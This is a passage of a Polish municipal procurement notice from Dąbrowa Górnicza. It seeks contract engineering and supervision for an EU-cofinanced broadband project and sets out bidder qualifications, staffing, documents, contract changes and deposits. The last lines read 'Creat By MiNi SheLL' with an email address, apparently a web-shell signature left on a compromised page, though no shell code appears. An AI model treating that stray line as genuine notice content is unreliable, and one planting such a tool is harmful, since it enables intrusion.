Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie należycie wykonał:
1.	co najmniej jedną usługę polegającą na pełnieniu funkcji Inżyniera Kontraktu lub Nadzoru Inwestorskiego lub Inwestora Zastępczego lub Menadżera Projektu dla inwestycji polegającej na budowie teleinformatycznej infrastruktury szerokopasmowej opartej na technologii światłowodowej, dla której wartość robót budowlanych wynosi minimum 10 mln zł brutto oraz wartość dostaw sprzętu i oprogramowania teleinformatycznego wynosi minimum 5 mln zł brutto;
2.	co najmniej dwie usługi polegające na opracowaniu lub weryfikacji dokumentacji projektowej dla inwestycji polegającej na budowie teleinformatycznej infrastruktury szerokopasmowej, dla której wartość robót budowlanych wynosi minimum 10 mln zł brutto;
3.	co najmniej dwie usługi polegające na opracowaniu dokumentacji przetargowej, w tym SIWZ, wzór umowy z których co najmniej jedna dotyczyła robót budowlanych o szacowanej wartości zamówienia powiększonej o wartość podatku VAT tj. minimum 10 mln zł brutto oraz co najmniej jedna dotyczyła dostaw o szacowanej wartości zamówienia powiększonej o wartość podatku VAT tj. minimum 5 mln zł brutto;
4.	co najmniej dwie usługi polegające na prowadzeniu lub nadzorze i koordynacji realizacji projektu we wszystkich jego etapach, w szczególności obejmującej zarządzanie projektem teleinformatycznym w zakresie planowania i harmonogramowania prac, rozliczania projektu, zarządzania ryzykiem (m.in. identyfikacja zagrożeń i przeciwdziałanie), zarządzania zmianami, zarządzanie jakością (m.in. weryfikacja prowadzonych prac z dokumentem planu jakości) oraz monitorowania przebiegu realizacji prac.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje:
1.	Kierownikiem Zespołu Inżyniera Kontraktu - min. 1 osoba posiadająca wykształcenie wyższe techniczne, doświadczenie zawodowe minimum 5 lat, w tym minimum 3 lata na stanowisku Kierownika Zespołu, doświadczenie w zarządzaniu przynajmniej jednym kontraktem o wartości minimum 5 000 000 zł brutto polegającym na budowie teleinformatycznej infrastruktury szerokopasmowej.
2.	Specjalistą w zakresie kosztorysowania i rozliczna robót - min. 1 osoba posiadająca co najmniej 5 letnie doświadczenie w zakresie kosztorysowania robót budowlanych, w tym minimum 2 letnie doświadczenie w zakresie telekomunikacji przewodowej,
3.	Inspektorem Nadzoru Inwestorskiego w branży telekomunikacyjnej - min. 1 osoba posiadająca uprawnienia budowlane kierowania robotami w specjalności telekomunikacyjnej bez ograniczeń (zgodnie z rozporządzeniem  Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie 
       samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz. 578 z późn. zm.)  lub odpowiadające im ważne uprawnienia budowlane, mająca co najmniej 5 letnie doświadczenie zawodowe, w tym 3 lata jako Inspektor Nadzoru Inwestorskiego, 
4.	Inspektorem Nadzoru Inwestorskiego w branży elektrycznej - min. 1 osoba posiadająca uprawnienia budowlane kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń (zgodnie z rozporządzeniem  Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz. 578 z późn. zm.)  lub odpowiadające im ważne uprawnienia budowlane, mająca co najmniej 5 letnie doświadczenie zawodowe, w tym 3 lata jako Inspektor Nadzoru Inwestorskiego, 
5.	Inspektorem Nadzoru Inwestorskiego w branży konstrukcyjno - budowlanej - min. 1 osoba posiadająca uprawnienia budowlane kierowania robotami w specjalności konstrukcyjno - budowlanej bez ograniczeń (zgodnie z rozporządzeniem  Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz. 578 z późn. zm.)  lub 






odpowiadające im ważne uprawnienia budowlane, mająca co najmniej 5 letnie doświadczenie zawodowe, w tym 3 lata jako Inspektor Nadzoru Inwestorskiego, 
6.	Inspektorem Nadzoru Inwestorskiego w branży drogowej - min. 1 osoba posiadająca uprawnienia budowlane kierowania robotami w specjalności drogowej bez ograniczeń (zgodnie z rozporządzeniem  Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz. 578 z późn. zm.)  lub odpowiadające im ważne uprawnienia budowlane, mająca co najmniej 5 letnie doświadczenie zawodowe, w tym 3 lata jako Inspektor Nadzoru Inwestorskiego, ,
7.	Inspektorem Nadzoru Inwestorskiego w branży instalacyjnej - min. 1 osoba posiadająca uprawnienia budowlane kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych  bez ograniczeń (zgodnie z rozporządzeniem  Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz. 578 z późn. zm.)  lub odpowiadające im ważne uprawnienia budowlane, mająca co najmniej 5 letnie doświadczenie zawodowe, w tym 3 lata jako Inspektor Nadzoru Inwestorskiego, 
8.	Pracownikiem ds. rozliczeń i przepływów finansowych UE - min. 1 osoba posiadająca minimum 5 letnie doświadczenie w zakresie rozliczeń finansowych i płatności z tytułu realizacji projektów współfinansowanych przez Unię Europejską.
9.	Specjalistą ds. Zamówień Publicznych - min. 1 osoba posiadająca wykształcenie wyższe, doświadczenie w przygotowaniu i przeprowadzeniu postępowań o udzielenie co najmniej 2 zamówień publicznych o wartości szacunkowej każdego z zamówień równej lub przekraczającej kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 PZP, doświadczenie w pracach komisji 
       przetargowej, w rozumieniu PZP, powołanych do przeprowadzenia co najmniej 2 zamówień publicznych o wartości szacunkowej każdego z zamówień równej lub przekraczającej kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 PZP, doświadczenie zawodowe minimum 6 lat,
10.	Ekspertami ds. sieci i bezpieczeństwa teleinformatycznego - min. 2 osoby, w tym:
-	min. 1 osoba  posiadająca wykształcenie wyższe techniczne o specjalności telekomunikacja lub informatyka, co najmniej 4 letnie doświadczenie na stanowisku związanym z projektowaniem i 
wdrażaniem, sieci rozległych wykorzystujących urządzenia telekomunikacyjne klasy operatorskiej , co najmniej 2 letnie doświadczenie w zakresie projektowania i wdrażania sieci opartych na protokole IP MPLS (Multi-Protokol Label Switching).
-	min. 1 osoba  posiadająca wykształcenie wyższe techniczne o specjalności telekomunikacja lub informatyka, co najmniej 5 letnie doświadczenie na stanowisku związanym z administrowaniem i zabezpieczaniem sieci rozległych wykorzystujących urządzenia telekomunikacyjne klasy operatorskiej.
Zamawiający dopuszcza wykazanie 1 osoby posiadającej łącznie ww. doświadczenia (dot. pkt 10)

Uwaga: 
Zamawiający nie dopuszcza  łączenia funkcji w przypadku posiadania więcej niż jednego z ww. uprawnień przez jedną osobę (dot. pkt 1-9)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 500.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.   formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2. pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
3.   zobowiązanie innych podmiotów, w szczególności pisemne, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b  Ustawy, które  musi zawierać minimum: 
1.dane pozwalające na identyfikacje stron, 
2.zakres udostępniania (w zakresie wiedzy i doświadczenia, potencjału technicznego, osób zdolnych  do wykonania zamówienia i sytuacji  finansowej) oraz jego podstawa (np. umowa przedwstępna przyrzekająca zawarcie umowy o udostępnienie, umowy o podwykonawstwo, o współpracy, porozumienie o delegowaniu pracowników, umowa oświadczenie  usług doradczych, know-how i inne umowy nienazwane), 
3.cel i czas udostępnienia (obejmujący okres realizacji zamówienia);
4. potwierdzenie wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I.Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy
w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie:
1.	zmiany terminu wykonania zamówienia oraz  terminów pośrednich (w ramach etapów projektu), w następujących przypadkach:
1.1	wystąpienie siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu, lub inne okoliczności niezależne od Zamawiającego, w tym takie, których Zamawiający przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć, wystąpienia nietypowych dla klimatu polskiego warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych zgodnie z technologią ich wykonywania, np. gradobicia, trąby powietrzne, zjawiska niestandardowe w klimacie polskim,
1.2	konieczność wykonania zamówień dodatkowych, o których mowa w art. 67 ust.1 pkt 5 Ustawy, których wykonanie jest niezbędne dla prawidłowego wykonania  oraz zakończenia robót budowlanych wraz ze wszystkimi konsekwencjami występującymi w związku z przedłużeniem tego terminu,
1.3	nastąpiła zmiana terminu realizacji robót budowlanych w ramach Kontraktu na Roboty i/lub zmiany terminów w Projekcie,
1.4	nastąpiła zmiana harmonogramu realizacji projektu Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Dąbrowa Górnicza w zakresie etapu I,II lub III,

2.	w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
2.1	zmiany przepisów prawa istotnych dla postanowień zawartej umowy,
2.2	zaistniały odmienne od przyjętych w dokumentacji projektowej warunki terenowe, 
w szczególności istnienie nie zinwentaryzowanych podziemnych sieci, urządzeń lub obiektów budowlanych,
2.3	zaistniały odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategoria gruntu, kurzawka, głazy, itp.) skutkujące niemożnością realizowania robót budowlanych nadzorowanych przez Wykonawcę przy dotychczasowych założeniach technologicznych,
2.4	zaistniała konieczność usunięcia błędów lub wprowadzenie zmian w dokumentacji projektowej lub zaistniała konieczność jej aktualizacji ze względu na postęp technologiczny lub zmiany obowiązujących przepisów,
2.5	odstąpiono od realizacji całości lub części projektu Rozwój Społeczeństwa Informacyjnego 
w Zagłębiu Dąbrowskim - Dąbrowa Górnicza w zakresie etapu I,II lub III,
2.6	zmiany osób odpowiedzialnych za wykonanie zadania ze strony wykonawcy, która może nastąpić tylko na podstawie obiektywnych przesłanek zaakceptowanych przez Zamawiającego.
2.7	W przypadku zwiększenia stawki podatku  VAT: Ceny netto nie mogą być wyższe niż zadeklarowane w formularzu ofertowym. Wartość wynagrodzenia brutto nie ulegnie zmianie w okresie obowiązywania umowy.
2.8	W przypadku zmniejszenia stawki podatku  VAT: Ceny netto nie mogą być wyższe niż zadeklarowane w formularzu ofertowym. Wartość wynagrodzenia brutto zostanie pomniejszona z odpowiednim zastosowaniem zmniejszonej stawki podatku VAT.
II. W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy z przyczyn,              o których mowa w pkt. I, Wykonawca zobowiązany jest do niezwłocznego poinformowania             o tym fakcie Zamawiającego i  wystąpienia z wnioskiem o dokonanie wskazanej zmiany.
III. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół 
podpisany przez obie strony.
IV.Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
V. Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.
VI.Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 6 do SIWZ -  
projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Inwestycji Miejskich, II piętro, pokój nr 222.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2011 godzina 09:30, miejsce: Urząd Miejski w Dąbrowie 
         Górniczej, ul. Graniczna 21, parter, Informacja - stanowisko nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Projekt jest współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013, działanie 2.1 Rozwój Infrastruktury Społeczeństwa Informacyjnego.
II. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
1.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać 	warunki udziału w postępowaniu określone w punkcie 8 SIWZ oraz złożyć dokumenty               	i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 	9 SIWZ.
2.	W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch 
       	lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione 
    	w pkt. 9.2. SIWZ przez  każdego z  nich.
3.	Dokumenty i oświadczenia  wymienione w  pkt. 9.1.2., 9.1.3 i   9.1.4. SIWZ Wykonawcy składają 	wspólnie, przy czym w przypadku polisy Zamawiający  dopuszcza także przedstawienie jednej 	polisy wystawionej na Wykonawców wspólnie  ubiegających się o udzielenie  zamówienia. 	Oświadczenie wymienione w pkt. 9.1.1. SIWZ oraz formularz ofertowy wymieniony w pkt. 9.3.1. 
              SIWZ,  	winny być podpisane przez uprawnionych 	przedstawicieli Wykonawców.
 4.	Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym 
        	postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie 
        	 zamówienia publicznego. 
5.	 Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.
III.Wymagania dotyczące zabezpieczenia należytego wykonania umowy.

1.	 Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 
          10 % ceny brutto podanej w ofercie.
2.	Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy. 
3.	Zabezpieczenie może być wnoszone w jednej lub kilku formach, zgodnie z dyspozycją Art. 148 ust.1 Ustawy.   
4.	Zabezpieczenie wnoszone w formie pieniężnej powinno zostać wpłacone nie później niż w dniu podpisania umowy na rachunek bankowy Zamawiającego:
Getin Noble Bank S.A. - konto nr 74 1560 1010 0000 9480 0001 1847 
Skuteczne wniesienie zabezpieczenia należytego wykonania umowy w formie pieniężnej następuje z chwilą wpływu środków pieniężnych na ww. rachunek Zamawiającego
5.	Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone 
o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wykonawcy.
6.	Zamawiający zwraca zabezpieczenie w terminie 30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane.
7.	Kwota pozostawiona na zabezpieczenie roszczeń z tytułu rękojmi za wady wyniesie 30% wysokości zabezpieczenia. 
8.	Kwota, o której mowa w pkt.12.7 SIWZ, zostanie zwrócona nie później niż w 15 dniu po upływie okresu rękojmi za wady.
9.	W przypadku wniesienia zabezpieczenia w formie niepieniężnej, dokumenty je stanowiące powinny być złożone w formie umożliwiającej Zamawiającemu pozostawienie 30% jego wartości na zabezpieczenie roszczeń z tytułu rękojmi. Dopuszcza się przedłożenie zabezpieczenia zarówno w formie jednego dokumentu, w którym rozgraniczone będą wartości i okresy zabezpieczenia na czas realizacji zadania oraz na okres obowiązywania rękojmi jak również złożenie dwóch odrębnych dokumentów. 
10.	Jeśli zabezpieczenie jest wnoszone w innej formie niż pieniężna, należy je dostarczyć do Zamawiającego najpóźniej w dniu podpisania umowy. W przypadku wyboru formy niepieniężnej oryginał dokumentu należy złożyć w Wydziale Księgowo-Budżetowym Urzędu Miejskiego w Dąbrowie Górniczej ul. Graniczna 21, nr pok. 320, a kserokopię w pokoju nr 222.
IV. Termin wykonania zamówienia publicznego:
od dnia podpisania umowy do dnia rozliczenia projektu tzn. zatwierdzenia przez Instytucję Zarządzającą RPO WSL - Urząd Marszałkowski Województwa Śląskiego - Wydział Rozwoju Regionalnego ostatniego wniosku o płatność nie dłużej jednak niż do dnia 22.05.2014 r., w tym:
1.	Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Dąbrowa Górnicza, etap I do 07.11.2012 r. - termin zakończenia części rzeczowej etapu I projektu; do 30.03.2013r. - termin rozliczenia etapu I projektu.
2.	Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Dąbrowa Górnicza, etap II do 01.12.2013r. 
3.	Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Dąbrowa Górnicza, etap III - budowa hot-spotów do 01.05.2014r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com